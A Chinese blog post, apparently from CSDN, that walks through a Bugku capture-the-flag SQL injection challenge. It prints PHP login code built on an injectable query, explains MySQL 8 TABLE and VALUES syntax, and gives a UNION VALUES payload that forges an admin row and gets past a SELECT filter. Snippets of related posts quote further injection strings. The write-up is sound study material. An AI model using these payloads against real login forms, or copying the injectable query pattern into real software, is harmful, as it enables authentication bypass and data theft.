无select注入

最新推荐文章于 2024-07-13 18:10:19 发布
最新推荐文章于 2024-07-13 18:10:19 发布
阅读量371 收藏 8
点赞数 17
文章标签: 数据库 web安全 安全 php
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_74925081/article/details/139291500
版权

以bugku上一道题为例:

打开为一个登录界面

观察源码为:

<?php


$user = NULL;
$is_admin = 0;


if (isset($_GET["source"])) {
    highlight_file(__FILE__);
    exit;
}


if (isset($_POST["username"]) && isset($_POST["password"])) {
    $username = $_POST["username"];
    $password = $_POST["password"];


    $db = new PDO("sqlite:../database.db");
    $db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);


    try {
        $db->exec("CREATE TABLE IF NOT EXISTS users (username TEXT UNIQUE, password TEXT, is_admin BOOL);");


        $q = "username, is_admin FROM users WHERE username = '$username' AND password = '$password'";
        if (preg_match("/SELECT/i", $q)) {
            throw new Exception("only select is a forbidden word");
        }


        $rows = $db->query("SELECT " . $q, PDO::FETCH_ASSOC);
        foreach ($rows as $row) {
            $user = $row["username"];
            $is_admin = $row["is_admin"];
        }
    }
    catch (Exception $e) {
        exit("EXCEPTION!");
    }




}


?>

 需要传入两个参数username,password;并对select做了过滤

<!DOCTYPE html>
<html>
<head>
    <meta charset="UTF-8">
    <title>Just SQLi</title>
</head>
<body>
    <h1>Just SQLi</h1>    
    <div><a href="?source=1">view source</a>


    <?php if ($user) { ?>
    <div>Nice Login <?= $user ?></div>
        <?php if ($is_admin) { ?>
        <div>And Nice to Get the Admin Permission!</div>
        <div> <?= include("../flag.php"); ?></div>
        <?php } ?>
    <?php } ?>
    <form action="" method="POST">
        <div>username: <input type="text" name="username" required></div>
        <div>password: <input type="text" name="password" required></div>


        <div>
            <input type="submit" value="Login">
        </div>
    </form>


</body>
</html>
判断 if ($is_admin),为真即输出包含文件flag.php;
代码  $db->exec("CREATE TABLE IF NOT EXISTS users (username TEXT UNIQUE, password TEXT, is_admin BOOL);");创建了一个user表,表里存在一个类型为bool的参数;
观察代码发现$q是由传入参数拼接而成的,考虑通过注入生成一个bool类型为1的账号;
在mysql8之后,多了两个新的用法table ,value,可用于代替select
TABLE 
TABLE users;
等于
SELECT * FROM users;
//区别
1.TABLE始终显示表的所有列
2.TABLE不允许对行进行任意过滤,即TABLE 不支持任何WHERE子句

VALUES:

VALUES row_constructor_list [ORDER BY column_designator] [LIMIT number]


row_constructor_list:
    ROW(value_list)[, ROW(value_list)][, ...]


value_list:
    value[, value][, ...]


column_designator:
    column_index


//VALUES是MySQL 8.0.19中引入的DML语句,它以表的形式返回一组一行或多行。换句话说,它是一个表值构造函数,也用作独立的 SQL
语句。
这里需要构造一个用户的bool类型,所以使用values, values 也可以结合union 使用,判断列数和进行注入
观察代码发现提交参数username为'号闭合,所以需要一个'闭合username前的';
提交: 
username=admin' UNION VALUES ('admin',1) --+&password=1

得到flag

绝情且小帅
关注
  • 17
    点赞
  • 8
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
MSSQL注入语句总结
聚鼎安全
12-24 1434
目录:基础语句注入点权限判断获取数据库获取指定数据库中的表的列的数据库判断数据库级别的角色SQL特性: 关于mssql的注入语句,跟mysql也差不了多少,都是从information_scheam库中获取各种数据。 基础语句 select ***://查询指令 @@version // 数据库版本 system_user //系统用户名 suser_sname() //查出当前操作数据库的登入名,一般和触发器一起用来监控是谁对表做了操作 user //获取当前数据
sql注入网站源码
04-09
例如,如果一个登录页面的查询语句是"SELECT * FROM Users WHERE username = '" + Request("username") + "' AND password = '" + Request("password") + "'",攻击者可能会输入"admin' OR '1'='1",导致所有用户的...
省赛 EZSQL
Je3Z的博客
05-18 275
考察知识点 MYSQL8 无SELECT 盲注 无select注入特性 第一步 是bool盲注,但是没有select, 无select注入,使用的是table语句。 TABLE table_name [ORDER BY column_name] [LIMIT number [OFFSET number]] 这个作用是列出表的全部内容,于是就可以利用这个语句来进行注入。 首先需要知道表名使用MySQL一些自带的特殊表来盲注表 information_schema.TABLESPACES_EXTENSIO
不需要查询字段的union select注入
Firebasky的博客
07-26 644
这篇文章是来自安恒七月赛DASCTFweb类的sqli,看了Y1ng师傅的wp引起的思考。 进入正题 我们知道当我们使用union select 1,2,3 from test 查询的时候需要满足和前面表的字段数相同。 而且如果我们需要进一步的查询数据就需要获得字段名,通过INFORMATION_SCHEMA.COLUMNS 但是我们可不可以直接用union select * from users来查询数据 (假如users 的字段和前面表的字段一样) 结果发现报错,不能使用。 那么我们想一想,既然相同字
select SQL注入
aloneBUThappy的博客
12-20 3347
select SQL注入
SQL注入绕过select过滤
qq_43596950的博客
03-25 4517
原题目出自攻防世界收录的2019强网杯,官网已有writer up,此博文仅个人的做题笔记 原题目链接:adworld.xctf.org.cn select被过滤可以考虑使用show显示表名和列名 http://ip:port/?inject= ';show databases;show tables;show columns from table; alter更改表名,利用源代码中的select进行查询 alter语句: ALTER TABLE 表名 CHANGE COLUMN 列名 【新】列名
SQL注入绕过
qq_45557130的博客
10-10 1798
sql注入绕过
sql注入详解
热门推荐
good good study
05-05 20万+
SQL注入(SQL Injection)是一种常见的Web安全漏洞,主要形成的原因是在数据交互中,前端的数据传入到后台处理时,没有做严格的判断,导致其传入的“数据”拼接到SQL语句中后,被当作SQL语句的一部分执行。 从而导致数据库受损(被脱库、被删除、甚至整个服务器权限陷)。 即:注入产生的原因是后台服务器接收相关参数未经过滤直接带入数据库查询...
sql注入讲解ppt.pptx
08-10
SQL 注入基础知识点总结 SQL 注入是指 web 应用程序对用户输入数据的合法性没有判断或过滤不严,攻击者可以在 web 应用程序中事先定义好的查询语句的结尾上添加额外的 SQL 语句,在管理员不知情的情况下实现非法...
sql注入靶场.zip
06-24
在开始之前,你需要熟悉基本的SQL语法,包括SELECT、INSERT、UPDATE、DELETE等语句,以及了解如何构造条件语句(如WHERE子句)。此外,了解不同数据库系统(如MySQL、PostgreSQL、Oracle)的特性也十分有用,因为...
SQL注入思路详解
12-14
- 报错注入示例:`floor() And (select 1 from(select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a)` 这样的语句可能会触发MySQL的错误,从而暴露数据库信息。...
各种注入方式源码
10-24
例如,一个不安全的查询可能会像这样:"SELECT * FROM Users WHERE Username = '" + userInput + "'"; 如果`userInput`未经验证,攻击者可以输入"'" + ' OR ' + '1' = '1",导致所有用户记录被返回。源码中可能包含...
JavaFx+MySql学生管理系统
2301_81253185的博客
07-11 1095
上个月学习了javafx和mysql数据库,于是写了一个学生管理系统,因为上个月在复习并且有一些事情,比较忙,所以没有更新博客了,这个项目页面虽然看着有点简陋了,但是大致内容还是比较简单的,于是现在跟大家分享一下我的学生管理系统,希望对这方面有兴趣的同学提供一些帮助。
set user & password for database 设置数据库 用户和密码
DavidsonGong的博客
07-12 144
USE sbms;
7.10飞书一面面经
东篱君的博客
07-10 1187
B+树的⾮叶⼦节点不存放实际的记录数据,仅存放索引,所以数据量相同的情况下,相⽐存储即存索引⼜存记录的 B 树,B+树的⾮叶⼦节点可以存放更多的索引,因此 B+ 树可以⽐ B 树更「矮胖」,查询底层节点的磁盘 I/O次数会更少。主从复制:单节点Redis的并发能力是有上限的,要进一步提高Redis的并发能力,可以搭建主从集群,实现读写分离。B+ 树有⼤量的冗余节点(所有⾮叶⼦节点都是冗余索引),这些冗余索引让 B+ 树在插⼊、删除的效率都更⾼,⽐如删除根节点的时候,不会像 B 树那样会发⽣复杂的树的变化;
mysql笔记1
m0_62975692的博客
07-11 371
首先查看systemctl status mysqld,如果是关闭的可以进入的配置文件打开mysql,我的mysql配置文件就是在/usr/local/mysql/support-filess/下,在此目录下执行./mysql.server start,打开mysql服务,也可以通过systmectl start mysqld,如果你嫌麻烦的话可以systemctl enable mysqld 一直打开mysql的服务;重新给字段添加约束的时候不可以添加not null约束的!
Redis集群和高可用
最新发布
xiaogengtongxu的博客
07-13 406
主从架构无法实现master和slave角色的自动切换,即当master出现redis服务异常、主机断电、磁盘损坏等问题导致master无法使用,而redis主从复制无法实现自动的故障转移(将slave 自动提升为新master),需要手动修改环境配置,才能切换到slave redis服务器,另外当单台Redis服务器性能无法满足业务写入需求的时候,也无法横向扩展Redis服务的并行写入性能。master和slave角色的无缝切换,让业务无感知从而不影响业务使用。
docker-compose安装PolarDB-PG数据库
wnfff的博客
07-12 290
docker-compose安装PolarDB-PG数据库
sql注入 select
06-06
而在SQL注入攻击中,SELECT语句常常是重中之重。 SELECT语句是SQL中最常用的语句之一,它用于从数据库中选择数据。然而,如果开发人员没有对用户输入进行有效的过滤和验证,攻击者就可以通过构造恶意的SQL查询语句...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值